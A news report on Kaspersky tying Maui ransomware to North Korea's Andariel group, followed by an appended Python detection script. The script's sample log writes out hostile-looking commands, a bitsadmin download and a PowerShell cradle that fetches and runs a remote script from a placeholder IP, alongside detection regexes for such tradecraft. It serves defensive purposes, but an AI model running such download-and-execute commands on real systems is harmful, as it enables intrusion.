
Maui ransomware linked to North Korean group Andariel

Attack origins point to April 2021 first strike on Japanese target


The Maui ransomware that has been used against US healthcare operations has been linked to Andariel, a North Korean state-sponsored threat with links to the notorious Lazarus Group.

Researchers at Kaspersky said this week they were able to trace the origins of Maui to April 2021 – a month earlier than the strain had previously been reported. An examination of log data also showed how the attack was staged in advance.

About 10 hours before the April Maui attack, the criminals inserted a variant of the DTrack malware into the target. Kaspersky also noted the presence of the 3Proxy tool – a proxy server used to reach internal resources – for several months prior to the ransomware deployment on an unnamed Japanese housing company.

"This data point, along with others, should openly help solidify the attribution to the Korean-speaking APT Andariel, also known as Silent Chollima and Stonefly," the researchers wrote in a report.

Andariel has been active since 2015, running attacks to steal data and bring in revenue for the North Korean regime. The group's targets have been primarily in South Korea and other Asian countries, as well as the lucrative American market.

Last month, the US State Department included Andariel in a list of North Korean state-sponsored threat groups – including Lazarus as well as BlueNoroff, Guardians of Peace, and Kimsuky – that the agency is targeting with a $10 million reward for information about the gangs and their operators. The State Department said these groups are targeting critical infrastructure within the homeland.

Kaspersky researchers, pointing to build timestamps, suggested that the attack on the Japanese organization was probably the first involving the Maui ransomware, which has garnered a lot of attention over the past year. The US Cybersecurity and Infrastructure Security Agency (CISA) and FBI in early July issued a warning about Maui, noting its connection to North Korean threat groups and its targeting of US healthcare organizations.

That month the Department of Justice and FBI also said they were able to claw back about $500,000 that healthcare facilities had paid in ransom during Maui attacks, recovering the money by tracing it through the blockchain and identifying accounts used to launder the digicash in China.

While CISA noted in its alert last month that the healthcare and public health sectors were the primary targets of Maui in the US, the Kaspersky analysts say they don't believe that the operation goes after specific industries as a pattern, and that its reach extends well beyond the US and Asia.

"Our research suggests that the actor is rather opportunistic and could compromise any company around the world, regardless of their line of business, as long as it enjoys good financial standing," they wrote. "It is probable that the actor favors vulnerable Internet-exposed web services. Additionally, the Andariel deployed ransomware selectively to make financial profits."

Kaspersky researchers said they linked Andariel to Maui through the use of the DTrack malware in the Japan incident and noted that the same DTrack variant was used in other attacks in Russia, Vietnam, and India during the same timeframe.

"The primary objective of this malware is the same as in the case of the aforementioned victim in Japan, using different login credentials and local IP address to exfiltrate data," they wrote.

The Maui attack on the Japanese housing organization was "remarkably similar" to past operations by Andariel, according to the researchers. Attack vectors included using legitimate proxy and tunneling tools after the initial infection and to maintain access, as well as using PowerShell scripts and Bitsadmin to download additional malware.

Other similarities included using exploits to target known and unpatched vulnerable public services, including WebLogic and HFS, exclusively deploying DTrack, dwelling in targeted networks for months, and deploying ransomware on a global scale. ®
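The tradecraft described above – Bitsadmin and PowerShell used to pull down second-stage payloads, and a proxy tool such as 3Proxy left running for months – is visible in process-creation telemetry. The following is an added example written for this page, not Kaspersky's tooling or anything from the report: it runs a few simple rules over constructed log lines in an assumed "timestamp host image command-line" layout and then correlates hits per host. The proxy/tunnel watchlist (3proxy, plink) is an assumption; the page itself names only 3Proxy, and the IP addresses and file names in the sample are made up.

```python
import re
from typing import Dict, List, Set

# Constructed process-creation records (assumed layout:
# "<timestamp> <host> <image> <command line>"). Illustrative only; not
# telemetry from the incident discussed on the page.
SAMPLE_LOG = r"""
2021-04-12T01:03:11Z ws01 C:\Windows\System32\bitsadmin.exe bitsadmin /transfer job1 /download /priority high http://203.0.113.5/up.dat C:\Users\Public\up.dat
2021-04-12T01:04:20Z ws01 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/s.ps1')"
2021-04-12T01:10:02Z ws01 C:\ProgramData\3proxy.exe 3proxy.exe C:\ProgramData\3proxy.cfg
2021-04-12T08:30:00Z ws02 C:\Windows\System32\notepad.exe notepad.exe C:\Users\alice\notes.txt
2021-04-12T09:00:00Z ws02 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Get-Service
"""

# (rule name, regex applied to the command line). The proxy/tunnel watchlist
# is an assumption for this example; the page names only 3Proxy.
RULES = [
    ("bitsadmin_transfer",
     re.compile(r"bitsadmin(\.exe)?\b.*?/(transfer|addfile|create)\b", re.I)),
    ("powershell_download_cradle",
     re.compile(r"powershell(\.exe)?\b.*?(DownloadString|DownloadFile|Invoke-WebRequest"
                r"|\biwr\b|Net\.WebClient|-enc(odedcommand)?\b)", re.I)),
    ("proxy_or_tunnel_tool",
     re.compile(r"(^|[\\/\s])(3proxy|plink)(\.exe)?\b", re.I)),
]


def parse(line: str) -> Dict[str, str]:
    """Split one record into fields; the command line keeps its spaces."""
    ts, host, image, cmdline = line.split(None, 3)
    return {"timestamp": ts, "host": host, "image": image, "cmdline": cmdline}


def detect(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per (record, matching rule), in log order."""
    findings = []
    for raw in log_text.strip().splitlines():
        rec = parse(raw)
        for name, rx in RULES:
            if rx.search(rec["cmdline"]):
                findings.append({**rec, "rule": name})
    return findings


def correlate(findings: List[Dict[str, str]], min_rules: int = 2) -> Set[str]:
    """Hosts where at least `min_rules` distinct rules fired: a single
    bitsadmin job is noise, but download staging plus a proxy tool on the
    same box is the kind of chain the report describes."""
    per_host: Dict[str, Set[str]] = {}
    for f in findings:
        per_host.setdefault(f["host"], set()).add(f["rule"])
    return {h for h, rules in per_host.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    hits = detect(SAMPLE_LOG)
    for h in hits:
        print(f"{h['timestamp']} {h['host']} {h['rule']}: {h['cmdline'][:60]}")
    print("hosts to triage:", sorted(correlate(hits)))
```

Tuning note: the benign `powershell -Command Get-Service` line is deliberately left unflagged; the cradle rule keys on download and encoded-command patterns rather than on PowerShell itself, which is how you keep this from drowning in administrator noise.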
